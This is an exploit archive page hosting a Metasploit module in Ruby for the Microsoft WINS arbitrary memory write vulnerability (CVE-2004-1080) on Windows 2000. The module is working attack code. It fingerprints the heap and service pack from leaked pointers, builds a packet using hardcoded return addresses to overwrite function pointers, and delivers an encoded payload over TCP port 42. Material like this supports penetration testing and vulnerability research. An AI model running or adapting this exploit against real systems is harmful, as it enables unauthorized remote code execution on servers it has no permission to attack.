exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft WINS Service Memory Overwrite

Microsoft WINS Service Memory Overwrite
Posted Nov 26, 2009
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a arbitrary memory write flaw in the WINS service. This exploit has been tested against Windows 2000 only.

tags | exploit, arbitrary
systems | windows
advisories | CVE-2004-1080
SHA-256 | 85c23ae114221016947e1a2b1f0f56ddc35e424cb22d9bdbcb13848d698e7ea0

Microsoft WINS Service Memory Overwrite

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft WINS Service Memory Overwrite',
'Description' => %q{
This module exploits a arbitrary memory write flaw in the
WINS service. This exploit has been tested against Windows
2000 only.

},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1080'],
[ 'OSVDB', '12378'],
[ 'BID', '11763'],
[ 'MSB', 'MS04-045'],

],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 8000,
'MinNops' => 512,
'StackAdjustment' => -3500,

},
'Targets' =>
[
[
'Windows 2000 English', # Tested OK - 11/25/2005 hdm
{
'Platform' => 'win',
'Rets' => [ 0x5391f40, 0x53df4c4, 0x53922e0],
},
],
],
'DisclosureDate' => 'Dec 14 2004',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(42)
], self.class )
end

def check
ret = fprint()

info = 'This system is running '
info << ((ret[1] == '?') ? 'an unknown windows version ' : "Windows #{ret[1]} ")
info << ((ret[2] == '?') ? '' : "with service pack #{ret[2]} ")
info << (ret[3] ? '(clean heap)' : '(dirty heap)')

print_status(info)
return ret[0]
end

def exploit
ret = fprint()

if (ret[0] != Exploit::CheckCode::Vulnerable)
print_status("This system does not appear to be vulnerable")
return
end

# Windows 2000 SP0, SP2, SP3, SP4 only. SP1 does not have the
# same function pointer...
if (ret[1] != '2000' or ret[2] !~ /^[0234]/)
print_status("This target is not currently supported")
return
end

# This flag is un-set if the first leaked address is not the default of
# 0x05371e90. This can indicate that someone has already tried to exploit
# this system, or something major happened to the heap that will probably
# prevent this exploit from working.
if (not ret[3])
print_status("Warning: the leaked heap address indicates that this attack may fail");
end

# The base address of our structure in memory
base = target['Rets'][0]

# Address of the function pointers to overwrite (courtesy anonymous donor)
targ = target['Rets'][1]

# Address of the payload on the heap, past the structure
code = target['Rets'][2]

# Build up the wins packet
addr = ''
addr << ([code].pack('V') * 9)
addr << ([targ - 0x48].pack('V') * 14)

wins = addr * 10
wins << payload.encoded
wins << rand_text_english(9200-wins.length, payload_badchars)

wpkt = [wins.length + 8, -1, base].pack('NNN')
wpkt << wins

print_status(sprintf("Attempting to overwrite 0x%.8x with 0x%.8x (0x%.8x)", targ, code, base))

# Connect and send the request
connect
sock.put(wpkt)
handler
disconnect
end

# This fingerprinting routine will cause the structure base address to slide down
# 120 bytes. Subsequent fingerprints will not push this down any futher, however
# we need to make sure that fingerprint is always called before exploitation or
# the alignment will be way off.
def fprint

ret = [Exploit::CheckCode::Safe, '', '', '']

req = "\x00\x00\x00\x29\x00\x00\x78\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x02\x00\x05"+
"\x00\x00\x00\x00\x60\x56\x02\x01\x00\x1F\x6E\x03"+
"\x00\x1F\x6E\x03\x08\xFE\x66\x03\x00"

connect
sock.put(req)
data = sock.get_once
return ret if not data

ptrs = [ data[16,4].unpack('N')[0] ].concat( data[32,12].unpack('VVV') )

print_status(sprintf("WINS Fingerprint: [0x%.8x] 0x%.8x 0x%.8x 0x%.8x", *ptrs))

os = '2000'
sp = '?'
vi = false

# Check for Windows 2000 systems
case ptrs[3]
when 0x77f8ae78
sp = '0'
when 0x77f81f70
sp = '1'
when 0x77f82680
sp = '2'
when 0x77f83608
sp = '3'
when 0x77f89640
sp = '4'
when 0x77f82518
sp = '5'
when 0x77f81648 # Contributed by grutz[at]jingojango.net
sp = '3/4'
end

# Reset the OS string if no match was found
os = '?' if sp == '?'

# Check for Windows NT 4.0 systems
if (ptrs[0] > 0x02300000 and ptrs[0] < 0x02400000)
os = 'NT'
sp = '?'
end

# Heap is still pristine...
vi = true if ptrs[0] == 0x05371e90

# Determine if the patch has already been applied
req = "\x00\x00\x00\x0F\x00\x00\x78\x00" + data[16, 4] +
"\x00\x00\x00\x03\x00\x00\x00\x00"

sock.put(req)
data = sock.get_once
disconnect

ret[1] = os
ret[2] = sp
ret[3] = vi

if (data and data[6, 1] == "\x78")
ret[0] = Exploit::CheckCode::Vulnerable
end

return ret
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close